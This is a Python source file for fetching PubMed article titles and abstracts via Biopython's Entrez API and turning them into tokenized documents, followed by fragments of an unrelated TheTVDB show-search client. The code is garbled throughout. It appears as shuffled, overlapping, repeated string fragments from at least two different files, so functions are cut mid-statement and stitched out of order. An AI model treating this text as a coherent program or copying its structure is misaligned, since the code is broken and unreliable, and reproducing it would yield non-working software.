files: pmid = get_data_from_pdf(file, email) if", "Term def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if pmids", "xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract", "pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids,", "pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return None, None def", "article['Abstract']['AbstractText'][0] return {'Title': title, 
'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} #Using", "handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path", "stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type =", "get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml')", "pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key", "pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email,", "handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList']", "email): Entrez.email = email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid =", "[] try: for file in files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid)", "docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>'", "on the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model\" #", "stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title =", "try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title':", "email 
Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0]", "available antiviral drugs that may act on the novel coronavirus (SARS-CoV-2) through a", "get_data_from_term(term, email, retmax) if pmids is None: return None else: docs, pmids_not_found =", "email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return", "#Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in pdf_paths: with", "email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record =", "email) if data is None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type", "pmids: sentences = [] data = get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid)", "'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config): pmids =", "= xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract':", "data_structures.sentence import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import", "__name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path,", "'__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) #", "wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email,", "# term = \"Predicting commercially available antiviral drugs that may act on the", "= '<KEY>' handle = 
efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article", "''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return", "'Abstract': ''} #Using Term def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email,", "get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None if __name__ == '__main__': #", "deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf', 'D:/Desktop/artigos/Mohan.pdf',", "Entrez.email = email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title,", "interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf',", "pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>' handle", "efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title =", "= article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''}", "term = \"Predicting commercially available antiviral drugs that may act on the novel", "dl_config): pmids = get_data_from_term(term, email, retmax) if pmids is None: return None else:", "string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found", "doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, 
lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title", "pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email =", "= 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '':", "for file in files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename)", "= get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email,", "'<EMAIL>')) # term = \"Predicting commercially available antiviral drugs that may act on", "open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config): pmids", "as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config): pmids = []", "pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found = []", "through a drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths =", "= get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None if", "= [] try: for file in files: pmid = get_data_from_pdf(file, email) if pmid:", "the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model\" # print(get_data_from_term(term,", "'<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except:", "if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: 
pmids_not_found.append(pmid) return docs,", "pmids is None: return None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return", "else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email = email", "for pmid in pmids: sentences = [] data = get_data_from_pmid(pmid, email) if data", "pmid except: return None if __name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' #", "data is None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't',", "import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string", "try: for file in files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else:", "try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return", "in files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found", "f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found", "= [] pmids_not_found = [] for pmid in pmids: sentences = [] data", "get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'],", "'<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article =", "from data_structures.document import Document from data_structures.sentence import Sentence from data_structures.token import Token from", "= email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record", "= Document(sentences=sentences) doc.raw_title = data['Title'] 
docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID", "from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io def pmids_to_docs(pmids,", "with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config):", "dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key = '<KEY>'", "stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return", "= '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close()", "xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract}", "get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax,", "model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf', 'D:/Desktop/artigos/Mohan.pdf', 'D:/Desktop/artigos/rdml.pdf', 'D:/Desktop/artigos/Yan.pdf']", "return docs, docs_not_found except: return None, None def get_data_from_pdf(file, email): Entrez.email = email", "[] pmids_not_found = [] for pmid in pmids: sentences = [] data =", "from data_structures.sentence import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary", "'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term, email,", "{'Title': title, 'Abstract': ''} except: article = 
xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract", "<filename>web/pubmed_reader.py from Bio.Entrez import efetch, read from Bio import Entrez import os import", "may act on the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning", "import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from data_structures.sentence", "get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs", "pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found", "os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from data_structures.sentence import", "lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid)", "docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return None,", "antiviral drugs that may act on the novel coronavirus (SARS-CoV-2) through a drug-target", "return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} #Using Term", "handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article']", "id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle']", "title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} except: article = 
xml_data['PubmedBookArticle'][0]['BookDocument']", "sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from data_structures.sentence import Sentence from", "learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf', 'D:/Desktop/artigos/Mohan.pdf', 'D:/Desktop/artigos/rdml.pdf',", "dl_config): pmids = [] docs_not_found = [] try: for file in files: pmid", "email): Entrez.email = email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data", "record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles =", "get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found = [] for pmid", "except: return {'Title': title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle']", "except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title':", "data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import", "doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using", "efetch, read from Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk", "get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None if __name__", "import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document", "docs.append(doc) 
else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email =", "title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term,", "passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc", "retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def", "[] docs_not_found = [] try: for file in files: pmid = get_data_from_pdf(file, email)", "dl_config) return docs, docs_not_found except: return None, None def get_data_from_pdf(file, email): Entrez.email =", "{'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} except: article =", "from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found =", "= email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>',", "coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList'])", "retmode='xml') xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try:", "def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file)", "def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in pdf_paths: with open(pdf_path, 'rb')", "pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except:", "commercially available antiviral drugs that may act on the novel coronavirus 
(SARS-CoV-2) through", "from Bio.Entrez import efetch, read from Bio import Entrez import os import sys", "Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle)", "title, 'Abstract': ''} #Using Term def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term,", "titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found =", "= article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return", "docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email", "split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else:", "record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in pdf_paths:", "return None, None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>' try:", "#using PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>' handle =", "'t', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'],", "lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a',", "None: pmids_not_found.append(pmid) else: if 
data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words,", "pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key", "docs_not_found except: return None, None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key =", "email)) return titles def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found = []", "idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email):", "import nltk from data_structures.document import Document from data_structures.sentence import Sentence from data_structures.token import", "docs, docs_not_found except: return None, None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key", "path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term =", "import Document from data_structures.sentence import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import", "term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if pmids is None:", "else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return", "import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found = [] for", "retmax=1)[0] return pmid except: return None if __name__ == '__main__': # path =", "return titles def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found = [] try:", "if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen,", 
"data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email", "files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found =", "= pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return None, None def get_data_from_pdf(file,", "remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid,", "sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract']", "email, dl_config): pmids = [] docs_not_found = [] try: for file in files:", "PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed',", "email, dl_config): docs = [] pmids_not_found = [] for pmid in pmids: sentences", "stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation,", "= 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting", "titles def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found = [] try: for", "if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, 
remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen,", "is None: return None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs", "'': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if", "import efetch, read from Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import", "= xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract':", "docs = [] pmids_not_found = [] for pmid in pmids: sentences = []", "Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for", "def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\",", "dl_config): docs = [] pmids_not_found = [] for pmid in pmids: sentences =", "def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found = [] for pmid in" ]
[]
[ "api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data =", "resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def", "def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json", "get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response =", "return None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else", "= 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data = {'apikey': 'api_key', 'username': 'username',", "'Not Available' for col in cols_needed))) for show in shows['data']) def get_image(url): return", "requests import requests_cache # path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) #", "None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not", "get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values()", "headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name},", "headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return", "shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview',", "dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available' 
for col in", "('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None yield from", "= response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return requests.get(resource_base_url_per_ep + url, headers=headers).content get_jwt()", "from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available' for", "200: global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def", "return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id',", "for show in shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id):", "requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers jwt = response.json()['token'] headers['Authorization'] =", "cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None", "'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None yield from (", "get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json =", "season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return requests.get(resource_base_url_per_ep +", "requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json()", "import requests_cache # path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', 
expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api',", "not None else 'Not Available' for col in cols_needed))) for show in shows['data'])", "{} def get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled():", "headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_", "'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global", "episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return requests.get(resource_base_url_per_ep + url,", "if show.get(col) is not None else 'Not Available' for col in cols_needed))) for", "= 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data = {'apikey':", "in cols_needed))) for show in shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content", "requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return", "= 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt():", "resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data = {'apikey': 'api_key', 'username':", "'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200:", "url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ = 
response_json['data'].values() return", "'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code ==", "( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available' for col", "requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers", "'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col)", "shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None", "requests_cache # path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite',", "backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers =", "'network', 'firstAired') if shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col)", "requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired')", "def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ =", "= {} def get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with", "requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # 
